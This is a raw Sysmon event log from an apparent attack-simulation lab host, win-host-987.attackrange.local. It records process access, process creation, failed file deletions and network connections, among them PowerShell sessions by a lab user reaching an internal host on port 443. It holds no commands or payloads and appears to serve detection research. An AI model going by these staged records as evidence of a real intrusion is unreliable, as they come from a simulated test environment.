18:19:13.002{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.002{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.002{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.002{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.001{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:12.983{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.982{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A0149D37D8B6171E6016B7D5169957A,SHA256=EB2BD560901A490864DB0C10ED77F7348B2C423B4EE8C60DD3887296823F0C97,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=367A0C9140F2AB753EBAAE89DD4E8ADC,SHA256=7E733C063BE1F972B0067AAA0AACB29EEC53D6606E2A97DBE3A4AB5184CED493,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:14.004{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A5F478AF0B364C418DB37F5641CABE0,SHA256=EC481498E2C204B2B7C3D9F82F36B7E4AE1BD8BCFC94170467A7ADF16A9D57BE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:40.592{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56837-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:15.801{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D021E4A37169206942D4E7F9D2F83708,SHA256=D398A2DB2DBBC2EBB849119ABA6C3296FED0B5E4AACB0F07099463BC41215E49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:16.019{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87773B303BB357FC2FC0D79ECDA702EA,SHA256=E4E73C9771FBE4882918A3459FD41564ABC89DD433CA2694393DD9EECF16876D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:17.050{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=201C94E63A2E048B5641276DDEE36F0E,SHA256=A7AA10D9476481C334CE2296375CBE47D405701BE801E6505BE75F7586DC555F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:18.080{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C529976522F148EEBFB11A87AC02BA66,SHA256=C6E2E0413EB16B19552FBB3880ED93649E9B2ED7FE9A2747E65133ED458C5C2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:19.797{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F1E0F94F342E9CB27BA48C8945C57B9D,SHA256=0AE83B759B25CCD48B4F6BF1B7B9D82E8D71AEDBD2B07B62BF85874A8923216B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:19.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52F93BA6B29F70D2D5541CF4F6D982E7,SHA256=2F25CFAF538C9EB26809AA4D0677AF6074DE5CB23CCC47C8A114E462899CEEF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:42.275{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56838-false10.0.1.12-8000- 23542300x800000000000000035086362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:20.116{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCF51C934621443DD389E2D75F1D026B,SHA256=0F1BACFBA70BA6B4FF85B24B4CFA27C0291BC3575EB9A2F5A68C762EA20215B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:21.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A2AE9925AEB3CF6BD1D4D1589A31064,SHA256=5DDA01ABBDAC9A68441567BF88C6F7EE5B404F8F26985703D54D9175911117D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:44.605{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56839-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:22.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F9E2BE15084FD7B272460C52301DDC9,SHA256=5E3A9AB7B8EBC5AED93863116606ADD8844A46B712000D764217265BEDDC548D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:23.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F9A5292DEAF64732E474EF59E30CB46,SHA256=42E8036FC1295D8E555CF1F3AEC62B39F2293DF085F4A11489F3ED2FEF4BAE21,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:24.212{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73B79A6B0B14C14E89A21466AF2C5199,SHA256=25FB9D724085245CDEECA631BE380136368F7C27B334321E31EB7860BFA3947D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:25.657{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C2BAB3747DF7943E7FCD54859812378F,SHA256=C46C73B8872149DA9A220A6A234B3B42FBDAEB8ED2115A1EB02346166F77C627,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:25.242{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0256AAB6BEECBB65F1DDA0F6C2719D9,SHA256=C43A685534AF076FC9A9C14BF528AD83A885A15AB94F2F7BBDA42DAB6307D4CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:48.186{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56840-false10.0.1.12-8000- 23542300x800000000000000035086371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:26.257{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC304FE88073B2ECB05AF919661061B9,SHA256=25BF192EA52911CB91D849955CE0472FC6F4FBC74575DDBE362F021C85A238BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:27.309{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82CD1D64B40EFBA4A644EA3719CD368,SHA256=FDAD8C83A7B3AAA1D22257C4B6898D6588FA7051C3475CDFB10ED7F9C77F92FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:50.616{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56841-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035086391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.990{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.988{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.988{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.988{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.987{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.987{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.987{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.971{B81B27B7-5030-613A-8A90-03000000C801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035086383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.508{B81B27B7-5030-613A-8990-03000000C801}46446908C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035086382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.324{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=819917F9E231C1B70CD8CA87093E77FE,SHA256=D44CE318F94563E0B9DA01D0303AA5DD8C0B436ACC16CD1511651ED0A8FE1746,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:28.289{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5030-613A-8990-03000000C801}4644C:\Program 